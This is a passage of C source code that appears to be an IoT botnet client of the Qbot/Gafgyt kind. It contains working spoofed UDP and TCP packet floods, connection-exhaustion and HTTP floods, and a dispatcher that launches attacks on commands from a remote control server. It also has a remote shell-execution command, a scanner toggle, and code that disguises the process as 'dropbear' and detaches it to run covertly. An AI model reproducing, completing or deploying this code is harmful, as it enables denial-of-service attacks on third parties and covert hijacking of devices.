972. int sockfd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
973. if(!sockfd)
974. {
975. sockprintf(mainCommSock, "Failed opening raw socket.");
976. return;
977. }
978.  
979. unsigned char *buf = (unsigned char *)malloc(packetsize + 1);
980. if(buf == NULL) return;
981. memset(buf, 0, packetsize + 1);
982. makeRandomStr(buf, packetsize);
983.  
984. int end = time(NULL) + timeEnd;
985. register unsigned int i = 0;
986. while(1)
987. {
988. sendto(sockfd, buf, packetsize, 0, (struct sockaddr *)&dest_addr, sizeof(dest_addr));
989.  
990. if(i == pollRegister)
991. {
992. if(port == 0) dest_addr.sin_port = rand_cmwc();
993. if(time(NULL) > end) break;
994. i = 0;
995. continue;
996. }
997. i++;
998. }
999. } else {
1000. int sockfd = socket(AF_INET, SOCK_RAW, IPPROTO_UDP);
1001. if(!sockfd)
1002. {
1003. sockprintf(mainCommSock, "Failed opening raw socket.");
1004. //sockprintf(mainCommSock, "REPORT %s:%s:%s", inet_ntoa(*(struct in_addr *)&(fds[i].ip)), usernames[fds[i].usernameInd], passwords[fds[i].passwordInd]);
1005. return;
1006. }
1007.  
1008. int tmp = 1;
1009. if(setsockopt(sockfd, IPPROTO_IP, IP_HDRINCL, &tmp, sizeof (tmp)) < 0)
1010. {
1011. sockprintf(mainCommSock, "Failed setting raw headers mode.");
1012. return;
1013. }
1014.  
1015. int counter = 50;
1016. while(counter--)
1017. {
1018. srand(time(NULL) ^ rand_cmwc());
1019. init_rand(rand());
1020. }
1021.  
1022. in_addr_t netmask;
1023.  
1024. if ( spoofit == 0 ) netmask = ( ~((in_addr_t) -1) );
1025. else netmask = ( ~((1 << (32 - spoofit)) - 1) );
1026.  
1027. unsigned char packet[sizeof(struct iphdr) + sizeof(struct udphdr) + packetsize];
1028. struct iphdr *iph = (struct iphdr *)packet;
1029. struct udphdr *udph = (void *)iph + sizeof(struct iphdr);
1030.  
1031. makeIPPacket(iph, dest_addr.sin_addr.s_addr, htonl( getRandomIP(netmask) ), IPPROTO_UDP, sizeof(struct udphdr) + packetsize);
1032.  
1033. udph->len = htons(sizeof(struct udphdr) + packetsize);
1034. udph->source = rand_cmwc();
1035. udph->dest = (port == 0 ? rand_cmwc() : htons(port));
1036. udph->check = 0;
1037.  
1038. makeRandomStr((unsigned char*)(((unsigned char *)udph) + sizeof(struct udphdr)), packetsize);
1039.  
1040. iph->check = csum ((unsigned short *) packet, iph->tot_len);
1041.  
1042. int end = time(NULL) + timeEnd;
1043. register unsigned int i = 0;
1044. while(1)
1045. {
1046. sendto(sockfd, packet, sizeof(packet), 0, (struct sockaddr *)&dest_addr, sizeof(dest_addr));
1047.  
1048. udph->source = rand_cmwc();
1049. udph->dest = (port == 0 ? rand_cmwc() : htons(port));
1050. iph->id = rand_cmwc();
1051. iph->saddr = htonl( getRandomIP(netmask) );
1052. iph->check = csum ((unsigned short *) packet, iph->tot_len);
1053.  
1054. if(i == pollRegister)
1055. {
1056. if(time(NULL) > end) break;
1057. i = 0;
1058. continue;
1059. }
1060. i++;
1061. }
1062. }
1063. }
1064.  
1065. //CNC Botnet Flood
1066. void sendCNC(unsigned char *ip,int port, int end_time)
1067. {
1068. int end = time(NULL) + end_time;
1069. int sockfd;
1070. struct sockaddr_in server;
1071. //sockfd = socket(AF_INET, SOCK_STREAM, 0);
1072.  
1073. server.sin_addr.s_addr = inet_addr(ip);
1074. server.sin_family = AF_INET;
1075. server.sin_port = htons(port);
1076.  
1077. while(end > time(NULL))
1078. {
1079. sockfd = socket(AF_INET, SOCK_STREAM, 0);
1080. connect(sockfd , (struct sockaddr *)&server , sizeof(server));
1081. sleep(1);
1082. close(sockfd);
1083. }
1084.  
1085. }
1086.  
1087. void sendHTTP(unsigned char *url, int end_time)
1088. {
1089. int end = time(NULL) + end_time;
1090. FILE *pf;
1091. char command[80];
1092. sprintf(command, "wget --no-check-certificate -q -O /tmp/null ");
1093. strcat(command, url);
1094.  
1095. pf = popen(command,"r");
1096.  
1097. while(end > time(NULL))
1098. {
1099. system(command);
1100. }
1101.  
1102. }
1103.  
1104. void sendTCP(unsigned char *target, int port, int timeEnd, int spoofit, unsigned char *flags, int packetsize, int pollinterval)
1105. {
1106. register unsigned int pollRegister;
1107. pollRegister = pollinterval;
1108.  
1109. struct sockaddr_in dest_addr;
1110.  
1111. dest_addr.sin_family = AF_INET;
1112. if(port == 0) dest_addr.sin_port = rand_cmwc();
1113. else dest_addr.sin_port = htons(port);
1114. if(getHost(target, &dest_addr.sin_addr)) return;
1115. memset(dest_addr.sin_zero, '\0', sizeof dest_addr.sin_zero);
1116.  
1117. int sockfd = socket(AF_INET, SOCK_RAW, IPPROTO_TCP);
1118. if(!sockfd)
1119. {
1120. sockprintf(mainCommSock, "Failed opening raw socket.");
1121. return;
1122. }
1123.  
1124. int tmp = 1;
1125. if(setsockopt(sockfd, IPPROTO_IP, IP_HDRINCL, &tmp, sizeof (tmp)) < 0)
1126. {
1127. sockprintf(mainCommSock, "Failed setting raw headers mode.");
1128. return;
1129. }
1130.  
1131. in_addr_t netmask;
1132.  
1133. if ( spoofit == 0 ) netmask = ( ~((in_addr_t) -1) );
1134. else netmask = ( ~((1 << (32 - spoofit)) - 1) );
1135.  
1136. unsigned char packet[sizeof(struct iphdr) + sizeof(struct tcphdr) + packetsize];
1137. struct iphdr *iph = (struct iphdr *)packet;
1138. struct tcphdr *tcph = (void *)iph + sizeof(struct iphdr);
1139.  
1140. makeIPPacket(iph, dest_addr.sin_addr.s_addr, htonl( getRandomIP(netmask) ), IPPROTO_TCP, sizeof(struct tcphdr) + packetsize);
1141.  
1142. tcph->source = rand_cmwc();
1143. tcph->seq = rand_cmwc();
1144. tcph->ack_seq = 0;
1145. tcph->doff = 5;
1146.  
1147. if(!strcmp(flags, "all"))
1148. {
1149. tcph->syn = 1;
1150. tcph->rst = 1;
1151. tcph->fin = 1;
1152. tcph->ack = 1;
1153. tcph->psh = 1;
1154. } else {
1155. unsigned char *pch = strtok(flags, ",");
1156. while(pch)
1157. {
1158. if(!strcmp(pch, "syn"))
1159. {
1160. tcph->syn = 1;
1161. } else if(!strcmp(pch, "rst"))
1162. {
1163. tcph->rst = 1;
1164. } else if(!strcmp(pch, "fin"))
1165. {
1166. tcph->fin = 1;
1167. } else if(!strcmp(pch, "ack"))
1168. {
1169. tcph->ack = 1;
1170. } else if(!strcmp(pch, "psh"))
1171. {
1172. tcph->psh = 1;
1173. } else {
1174. sockprintf(mainCommSock, "Invalid flag \"%s\"", pch);
1175. }
1176. pch = strtok(NULL, ",");
1177. }
1178. }
1179.  
1180. tcph->window = rand_cmwc();
1181. tcph->check = 0;
1182. tcph->urg_ptr = 0;
1183. tcph->dest = (port == 0 ? rand_cmwc() : htons(port));
1184. tcph->check = tcpcsum(iph, tcph);
1185.  
1186. iph->check = csum ((unsigned short *) packet, iph->tot_len);
1187.  
1188. int end = time(NULL) + timeEnd;
1189. register unsigned int i = 0;
1190. while(1)
1191. {
1192. sendto(sockfd, packet, sizeof(packet), 0, (struct sockaddr *)&dest_addr, sizeof(dest_addr));
1193.  
1194. iph->saddr = htonl( getRandomIP(netmask) );
1195. iph->id = rand_cmwc();
1196. tcph->seq = rand_cmwc();
1197. tcph->source = rand_cmwc();
1198. tcph->check = 0;
1199. tcph->check = tcpcsum(iph, tcph);
1200. iph->check = csum ((unsigned short *) packet, iph->tot_len);
1201.  
1202. if(i == pollRegister)
1203. {
1204. if(time(NULL) > end) break;
1205. i = 0;
1206. continue;
1207. }
1208. i++;
1209. }
1210. }
1211.  
1212. void sendJUNK(unsigned char *ip, int port, int end_time)
1213. {
1214.  
1215. int max = getdtablesize() / 2, i;
1216.  
1217. struct sockaddr_in dest_addr;
1218. dest_addr.sin_family = AF_INET;
1219. dest_addr.sin_port = htons(port);
1220. if(getHost(ip, &dest_addr.sin_addr)) return;
1221. memset(dest_addr.sin_zero, '\0', sizeof dest_addr.sin_zero);
1222.  
1223. struct state_t
1224. {
1225. int fd;
1226. uint8_t state;
1227. } fds[max];
1228. memset(fds, 0, max * (sizeof(int) + 1));
1229.  
1230. fd_set myset;
1231. struct timeval tv;
1232. socklen_t lon;
1233. int valopt, res;
1234.  
1235. unsigned char *watwat = malloc(1024);
1236. memset(watwat, 0, 1024);
1237.  
1238. int end = time(NULL) + end_time;
1239. while(end > time(NULL))
1240. {
1241. for(i = 0; i < max; i++)
1242. {
1243. switch(fds[i].state)
1244. {
1245. case 0:
1246. {
1247. fds[i].fd = socket(AF_INET, SOCK_STREAM, 0);
1248. fcntl(fds[i].fd, F_SETFL, fcntl(fds[i].fd, F_GETFL, NULL) | O_NONBLOCK);
1249. if(connect(fds[i].fd, (struct sockaddr *)&dest_addr, sizeof(dest_addr)) != -1 || errno != EINPROGRESS) close(fds[i].fd);
1250. else fds[i].state = 1;
1251. }
1252. break;
1253.  
1254. case 1:
1255. {
1256. FD_ZERO(&myset);
1257. FD_SET(fds[i].fd, &myset);
1258. tv.tv_sec = 0;
1259. tv.tv_usec = 10000;
1260. res = select(fds[i].fd+1, NULL, &myset, NULL, &tv);
1261. if(res == 1)
1262. {
1263. lon = sizeof(int);
1264. getsockopt(fds[i].fd, SOL_SOCKET, SO_ERROR, (void*)(&valopt), &lon);
1265. if(valopt)
1266. {
1267. close(fds[i].fd);
1268. fds[i].state = 0;
1269. } else {
1270. fds[i].state = 2;
1271. }
1272. } else if(res == -1)
1273. {
1274. close(fds[i].fd);
1275. fds[i].state = 0;
1276. }
1277. }
1278. break;
1279.  
1280. case 2:
1281. {
1282. makeRandomStr(watwat, 1024);
1283. if(send(fds[i].fd, watwat, 1024, MSG_NOSIGNAL) == -1 && errno != EAGAIN)
1284. {
1285. close(fds[i].fd);
1286. fds[i].state = 0;
1287. }
1288. }
1289. break;
1290. }
1291. }
1292. }
1293. }
1294.  
1295. void sendHOLD(unsigned char *ip, int port, int end_time)
1296. {
1297.  
1298. int max = getdtablesize() / 2, i;
1299.  
1300. struct sockaddr_in dest_addr;
1301. dest_addr.sin_family = AF_INET;
1302. dest_addr.sin_port = htons(port);
1303. if(getHost(ip, &dest_addr.sin_addr)) return;
1304. memset(dest_addr.sin_zero, '\0', sizeof dest_addr.sin_zero);
1305.  
1306. struct state_t
1307. {
1308. int fd;
1309. uint8_t state;
1310. } fds[max];
1311. memset(fds, 0, max * (sizeof(int) + 1));
1312.  
1313. fd_set myset;
1314. struct timeval tv;
1315. socklen_t lon;
1316. int valopt, res;
1317.  
1318. unsigned char *watwat = malloc(1024);
1319. memset(watwat, 0, 1024);
1320.  
1321. int end = time(NULL) + end_time;
1322. while(end > time(NULL))
1323. {
1324. for(i = 0; i < max; i++)
1325. {
1326. switch(fds[i].state)
1327. {
1328. case 0:
1329. {
1330. fds[i].fd = socket(AF_INET, SOCK_STREAM, 0);
1331. fcntl(fds[i].fd, F_SETFL, fcntl(fds[i].fd, F_GETFL, NULL) | O_NONBLOCK);
1332. if(connect(fds[i].fd, (struct sockaddr *)&dest_addr, sizeof(dest_addr)) != -1 || errno != EINPROGRESS) close(fds[i].fd);
1333. else fds[i].state = 1;
1334. }
1335. break;
1336.  
1337. case 1:
1338. {
1339. FD_ZERO(&myset);
1340. FD_SET(fds[i].fd, &myset);
1341. tv.tv_sec = 0;
1342. tv.tv_usec = 10000;
1343. res = select(fds[i].fd+1, NULL, &myset, NULL, &tv);
1344. if(res == 1)
1345. {
1346. lon = sizeof(int);
1347. getsockopt(fds[i].fd, SOL_SOCKET, SO_ERROR, (void*)(&valopt), &lon);
1348. if(valopt)
1349. {
1350. close(fds[i].fd);
1351. fds[i].state = 0;
1352. } else {
1353. fds[i].state = 2;
1354. }
1355. } else if(res == -1)
1356. {
1357. close(fds[i].fd);
1358. fds[i].state = 0;
1359. }
1360. }
1361. break;
1362.  
1363. case 2:
1364. {
1365. FD_ZERO(&myset);
1366. FD_SET(fds[i].fd, &myset);
1367. tv.tv_sec = 0;
1368. tv.tv_usec = 10000;
1369. res = select(fds[i].fd+1, NULL, NULL, &myset, &tv);
1370. if(res != 0)
1371. {
1372. close(fds[i].fd);
1373. fds[i].state = 0;
1374. }
1375. }
1376. break;
1377. }
1378. }
1379. }
1380. }
1381.  
1382. void processCmd(int argc, unsigned char *argv[])
1383. {
1384. int x;
1385. if(!strcmp(argv[0], "PING"))
1386. {
1387. sockprintf(mainCommSock, "PONG!");
1388. return;
1389. }
1390.  
1391. if(!strcmp(argv[0], "GETLOCALIP"))
1392. {
1393. sockprintf(mainCommSock, "My IP: %s", inet_ntoa(ourIP));
1394. return;
1395. }
1396.  
1397. if(!strcmp(argv[0], "SCANNER"))
1398. {
1399. if(argc != 2)
1400. {
1401. sockprintf(mainCommSock, "SCANNER ON | OFF");
1402. return;
1403. }
1404.  
1405. if(!strcmp(argv[1], "OFF"))
1406. {
1407. if(scanPid == 0) return;
1408. kill(scanPid, 9);
1409. sockprintf(mainCommSock, "REMOVING PROBE");
1410. scanPid = 0;
1411. }
1412.  
1413. if(!strcmp(argv[1], "ON"))
1414. {
1415. if(scanPid != 0) return;
1416. uint32_t parent;
1417. parent = fork();
1418.  
1419. if (parent > 0) { scanPid = parent; return;}
1420. else if(parent == -1) return;
1421. sockprintf(mainCommSock, "PROBING");
1422. StartTheLelz();
1423. _exit(0);
1424. }
1425. }
1426.  
1427. if(!strcmp(argv[0], "HOLD"))
1428. {
1429. if(argc < 4 || atoi(argv[2]) < 1 || atoi(argv[3]) < 1)
1430. {
1431. //sockprintf(mainCommSock, "HOLD <ip> <port> <time>");
1432. return;
1433. }
1434.  
1435. unsigned char *ip = argv[1];
1436. int port = atoi(argv[2]);
1437. int time = atoi(argv[3]);
1438.  
1439. if(strstr(ip, ",") != NULL)
1440. {
1441. unsigned char *hi = strtok(ip, ",");
1442. while(hi != NULL)
1443. {
1444. if(!listFork())
1445. {
1446. sendHOLD(hi, port, time);
1447. _exit(0);
1448. }
1449. hi = strtok(NULL, ",");
1450. }
1451. } else {
1452. if (listFork()) { return; }
1453.  
1454. sendHOLD(ip, port, time);
1455. _exit(0);
1456. }
1457. }
1458.  
1459. if(!strcmp(argv[0], "JUNK"))
1460. {
1461. if(argc < 4 || atoi(argv[2]) < 1 || atoi(argv[3]) < 1)
1462. {
1463. //sockprintf(mainCommSock, "JUNK <ip> <port> <time>");
1464. return;
1465. }
1466.  
1467. unsigned char *ip = argv[1];
1468. int port = atoi(argv[2]);
1469. int time = atoi(argv[3]);
1470.  
1471. if(strstr(ip, ",") != NULL)
1472. {
1473. unsigned char *hi = strtok(ip, ",");
1474. while(hi != NULL)
1475. {
1476. if(!listFork())
1477. {
1478. sendJUNK(hi, port, time);
1479. close(mainCommSock);
1480. _exit(0);
1481. }
1482. hi = strtok(NULL, ",");
1483. }
1484. } else {
1485. if (listFork()) { return; }
1486.  
1487. sendJUNK(ip, port, time);
1488. _exit(0);
1489. }
1490. }
1491.  
1492. if(!strcmp(argv[0], "UDP"))
1493. {
1494. if(argc < 6 || atoi(argv[3]) == -1 || atoi(argv[2]) == -1 || atoi(argv[4]) == -1 || atoi(argv[5]) == -1 || atoi(argv[5]) > 65500 || atoi(argv[4]) > 32 || (argc == 7 && atoi(argv[6]) < 1))
1495. {
1496. //sockprintf(mainCommSock, "UDP <target> <port (0 for random)> <time> <netmask (32 for non spoofed)> <packet size (1 to 65500)> (time poll interval, default 10)");
1497. return;
1498. }
1499.  
1500. unsigned char *ip = argv[1];
1501. int port = atoi(argv[2]);
1502. int time = atoi(argv[3]);
1503. int spoofed = atoi(argv[4]);
1504. int packetsize = atoi(argv[5]);
1505. int pollinterval = (argc == 7 ? atoi(argv[6]) : 10);
1506.  
1507. if(strstr(ip, ",") != NULL)
1508. {
1509. unsigned char *hi = strtok(ip, ",");
1510. while(hi != NULL)
1511. {
1512. if(!listFork())
1513. {
1514. sendUDP(hi, port, time, spoofed, packetsize, pollinterval);
1515. _exit(0);
1516. }
1517. hi = strtok(NULL, ",");
1518. }
1519. } else {
1520. if (listFork()) { return; }
1521.  
1522. sendUDP(ip, port, time, spoofed, packetsize, pollinterval);
1523. _exit(0);
1524. }
1525. }
1526.  
1527. if(!strcmp(argv[0], "HTTP"))
1528. {
1529. if(argc < 3 || atoi(argv[2]) < 1)
1530. {
1531. return;
1532. }
1533.  
1534. unsigned char *ip = argv[1];
1535. int time = atoi(argv[2]);
1536.  
1537. if(strstr(ip, ",") != NULL)
1538. {
1539. unsigned char *hi = strtok(ip, ",");
1540. while(hi != NULL)
1541. {
1542. if(!listFork())
1543. {
1544. int i = 0;
1545. while(i < 10){
1546. sendHTTP(ip, time);
1547. i++;
1548. }
1549. close(mainCommSock);
1550. _exit(0);
1551. }
1552. hi = strtok(NULL, ",");
1553. }
1554. } else {
1555. if (listFork()) { return; }
1556. int i = 0;
1557. while(i < 10){
1558. sendHTTP(ip, time);
1559. i++;
1560. }
1561. close(mainCommSock);
1562.  
1563. _exit(0);
1564. }
1565. }
1566.  
1567. if(!strcmp(argv[0], "CNC"))
1568. {
1569. if(argc < 4 || atoi(argv[2]) < 1 || atoi(argv[3]) < 1)
1570. {
1571.  
1572. return;
1573. }
1574.  
1575. unsigned char *ip = argv[1];
1576. int port = atoi(argv[2]);
1577. int time = atoi(argv[3]);
1578.  
1579. if(strstr(ip, ",") != NULL)
1580. {
1581. unsigned char *hi = strtok(ip, ",");
1582. while(hi != NULL)
1583. {
1584. if(!listFork())
1585. {
1586. sendCNC(hi, port, time);
1587. close(mainCommSock);
1588. _exit(0);
1589. }
1590. hi = strtok(NULL, ",");
1591. }
1592. } else {
1593. if (listFork()) { return; }
1594.  
1595. sendCNC(ip, port, time);
1596. _exit(0);
1597. }
1598. }
1599.  
1600. if(!strcmp(argv[0], "COMBO"))
1601. {
1602. if(argc < 4 || atoi(argv[2]) < 1 || atoi(argv[3]) < 1)
1603. {
1604.  
1605. return;
1606. }
1607.  
1608. unsigned char *ip = argv[1];
1609. int port = atoi(argv[2]);
1610. int time = atoi(argv[3]);
1611.  
1612. if(strstr(ip, ",") != NULL)
1613. {
1614. unsigned char *hi = strtok(ip, ",");
1615. while(hi != NULL)
1616. {
1617. if(!listFork())
1618. {
1619. sendJUNK(hi, port, time);
1620. sendHOLD(hi, port, time);
1621. close(mainCommSock);
1622. _exit(0);
1623. }
1624. hi = strtok(NULL, ",");
1625. }
1626. } else {
1627. if (listFork()) { return; }
1628.  
1629. sendJUNK(ip, port, time);
1630. sendHOLD(ip, port, time);
1631. _exit(0);
1632. }
1633. }
1634.  
1635. if(!strcmp(argv[0], "TCP"))
1636. {
1637. if(argc < 6 || atoi(argv[3]) == -1 || atoi(argv[2]) == -1 || atoi(argv[4]) == -1 || atoi(argv[4]) > 32 || (argc > 6 && atoi(argv[6]) < 0) || (argc == 8 && atoi(argv[7]) < 1))
1638. {
1639. //sockprintf(mainCommSock, "TCP <target> <port (0 for random)> <time> <netmask (32 for non spoofed)> <flags (syn, ack, psh, rst, fin, all) comma seperated> (packet size, usually 0) (time poll interval, default 10)");
1640. return;
1641. }
1642.  
1643. unsigned char *ip = argv[1];
1644. int port = atoi(argv[2]);
1645. int time = atoi(argv[3]);
1646. int spoofed = atoi(argv[4]);
1647. unsigned char *flags = argv[5];
1648.  
1649. int pollinterval = argc == 8 ? atoi(argv[7]) : 10;
1650. int psize = argc > 6 ? atoi(argv[6]) : 0;
1651.  
1652. if(strstr(ip, ",") != NULL)
1653. {
1654. unsigned char *hi = strtok(ip, ",");
1655. while(hi != NULL)
1656. {
1657. if(!listFork())
1658. {
1659. sendTCP(hi, port, time, spoofed, flags, psize, pollinterval);
1660. _exit(0);
1661. }
1662. hi = strtok(NULL, ",");
1663. }
1664. } else {
1665. if (listFork()) { return; }
1666.  
1667. sendTCP(ip, port, time, spoofed, flags, psize, pollinterval);
1668. _exit(0);
1669. }
1670. }
1671.  
1672. if(!strcmp(argv[0], "KILLATTK"))
1673. {
1674. int killed = 0;
1675. unsigned long i;
1676. for (i = 0; i < numpids; i++) {
1677. if (pids[i] != 0 && pids[i] != getpid()) {
1678. kill(pids[i], 9);
1679. killed++;
1680. }
1681. }
1682. }
1683.  
1684. if(!strcmp(argv[0], "FUCKOFF"))
1685. {
1686. exit(0);
1687. }
1688.  
1689. }
1690.  
1691. int initConnection()
1692. {
1693. unsigned char server[4096];
1694. memset(server, 0, 4096);
1695. if(mainCommSock) { close(mainCommSock); mainCommSock = 0; } //if da sock initialized then close dat
1696. if(currentServer + 1 == SERVER_LIST_SIZE) currentServer = 0;
1697. else currentServer++;
1698.  
1699. strcpy(server, commServer[currentServer]);
1700. int port = 443;
1701. if(strchr(server, ':') != NULL)
1702. {
1703. port = atoi(strchr(server, ':') + 1);
1704. *((unsigned char *)(strchr(server, ':'))) = 0x0;
1705. }
1706.  
1707. mainCommSock = socket(AF_INET, SOCK_STREAM, 0);
1708.  
1709. if(!connectTimeout(mainCommSock, server, port, 30)) return 1;
1710.  
1711. return 0;
1712. }
1713.  
1714. int getOurIP()
1715. {
1716. int sock = socket(AF_INET, SOCK_DGRAM, 0);
1717. if(sock == -1) return 0;
1718.  
1719. struct sockaddr_in serv;
1720. memset(&serv, 0, sizeof(serv));
1721. serv.sin_family = AF_INET;
1722. serv.sin_addr.s_addr = inet_addr("8.8.8.8");
1723. serv.sin_port = htons(53);
1724.  
1725. int err = connect(sock, (const struct sockaddr*) &serv, sizeof(serv));
1726. if(err == -1) return 0;
1727.  
1728. struct sockaddr_in name;
1729. socklen_t namelen = sizeof(name);
1730. err = getsockname(sock, (struct sockaddr*) &name, &namelen);
1731. if(err == -1) return 0;
1732.  
1733. ourIP.s_addr = name.sin_addr.s_addr;
1734.  
1735. int cmdline = open("/proc/net/route", O_RDONLY);
1736. char linebuf[4096];
1737. while(fdgets(linebuf, 4096, cmdline) != NULL)
1738. {
1739. if(strstr(linebuf, "\t00000000\t") != NULL)
1740. {
1741. unsigned char *pos = linebuf;
1742. while(*pos != '\t') pos++;
1743. *pos = 0;
1744. break;
1745. }
1746. memset(linebuf, 0, 4096);
1747. }
1748. close(cmdline);
1749.  
1750. if(*linebuf)
1751. {
1752. int i;
1753. struct ifreq ifr;
1754. strcpy(ifr.ifr_name, linebuf);
1755. ioctl(sock, SIOCGIFHWADDR, &ifr);
1756. for (i=0; i<6; i++) macAddress[i] = ((unsigned char*)ifr.ifr_hwaddr.sa_data)[i];
1757. }
1758.  
1759. close(sock);
1760. }
1761.  
1762. char *getBuild()
1763. {
1764. #ifdef MIPS_BUILD
1765. return "MIPS";
1766. #elif MIPSEL_BUILD
1767. return "MIPSEL";
1768. #elif X86_BUILD
1769. return "X86";
1770. #elif ARM_BUILD
1771. return "ARM";
1772. #elif PPC_BUILD
1773. return "PPC";
1774. #else
1775. return "DONGS";
1776. #endif
1777. }
1778.  
1779. int main(int argc, unsigned char *argv[])
1780. {
1781. char *mynameis = "/usr/sbin/dropbear";
1782. if(SERVER_LIST_SIZE <= 0) return 0;
1783. printf("BUILD %s\n", getBuild());
1784. strncpy(argv[0],"",strlen(argv[0]));
1785. argv[0] = "/usr/sbin/dropbear";
1786. prctl(PR_SET_NAME, (unsigned long) mynameis, 0, 0, 0);
1787. srand(time(NULL) ^ getpid());
1788. init_rand(time(NULL) ^ getpid());
1789. pid_t pid1;
1790. pid_t pid2;
1791. int status;
1792.  
1793. getOurIP();
1794.  
1795. if (pid1 = fork()) {
1796. waitpid(pid1, &status, 0);
1797. exit(0);
1798. } else if (!pid1) {
1799. if (pid2 = fork()) {
1800. exit(0);
1801. } else if (!pid2) {
1802. } else {
1803. //zprintf("fork failed\n");
1804. }
1805. } else {
1806. //zprintf("fork failed\n");
1807. }
1808.  
1809. setsid();
1810. chdir("/");
1811.  
1812. signal(SIGPIPE, SIG_IGN);
1813.  
1814. while(1)
1815. {
1816. if(initConnection()) { sleep(5); continue; }
1817.  
1818. sockprintf(mainCommSock, "BUILD %s", getBuild());
1819.  
1820. char commBuf[4096];
1821. int got = 0;
1822. int i = 0;
1823. while((got = recvLine(mainCommSock, commBuf, 4096)) != -1)
1824. {
1825. for (i = 0; i < numpids; i++) if (waitpid(pids[i], NULL, WNOHANG) > 0) {
1826. unsigned int *newpids, on;
1827. for (on = i + 1; on < numpids; on++) pids[on-1] = pids[on];
1828. pids[on - 1] = 0;
1829. numpids--;
1830. newpids = (unsigned int*)malloc((numpids + 1) * sizeof(unsigned int));
1831. for (on = 0; on < numpids; on++) newpids[on] = pids[on];
1832. free(pids);
1833. pids = newpids;
1834. }
1835.  
1836. commBuf[got] = 0x00;
1837.  
1838. trim(commBuf);
1839.  
1840. if(strstr(commBuf, "PING") == commBuf)
1841. {
1842. sockprintf(mainCommSock, "PONG");
1843. continue;
1844. }
1845.  
1846. if(strstr(commBuf, "DUP") == commBuf) exit(0);
1847.  
1848. unsigned char *message = commBuf;
1849.  
1850. if(*message == '!')
1851. {
1852. unsigned char *nickMask = message + 1;
1853. while(*nickMask != ' ' && *nickMask != 0x00) nickMask++;
1854. if(*nickMask == 0x00) continue;
1855. *(nickMask) = 0x00;
1856. nickMask = message + 1;
1857.  
1858. message = message + strlen(nickMask) + 2;
1859. while(message[strlen(message) - 1] == '\n' || message[strlen(message) - 1] == '\r') message[strlen(message) - 1] = 0x00;
1860.  
1861. unsigned char *command = message;
1862. while(*message != ' ' && *message != 0x00) message++;
1863. *message = 0x00;
1864. message++;
1865.  
1866. unsigned char *tmpcommand = command;
1867. while(*tmpcommand) { *tmpcommand = toupper(*tmpcommand); tmpcommand++; }
1868.  
1869. if(strcmp(command, "SH") == 0)
1870. {
1871. unsigned char buf[1024];
1872. int command;
1873. if (listFork()) continue;
1874. memset(buf, 0, 1024);
1875. szprintf(buf, "%s 2>&1", message);
1876. command = fdpopen(buf, "r");
1877. while(fdgets(buf, 1024, command) != NULL)
1878. {
1879. trim(buf);
1880. // sockprintf(mainCommSock, "%s", buf);
1881. memset(buf, 0, 1024);
1882. sleep(1);
1883. }
1884. fdpclose(command);
1885. exit(0);
1886. }
1887.  
1888. unsigned char *params[10];
1889. int paramsCount = 1;
1890. unsigned char *pch = strtok(message, " ");
1891. params[0] = command;
1892.  
1893. while(pch)
1894. {
1895. if(*pch != '\n')
1896. {
1897. params[paramsCount] = (unsigned char *)malloc(strlen(pch) + 1);
1898. memset(params[paramsCount], 0, strlen(pch) + 1);
1899. strcpy(params[paramsCount], pch);
1900. paramsCount++;
1901. }
1902. pch = strtok(NULL, " ");
1903. }
1904.  
1905. processCmd(paramsCount, params);
1906.  
1907. if(paramsCount > 1)
1908. {
1909. int q = 1;
1910. for(q = 1; q < paramsCount; q++)
1911. {
1912. free(params[q]);
1913. }
1914. }
1915. }
1916. }
1917. //printf("Link closed by server.\n");
1918. }
1919.  
1920. return 0;
1921. }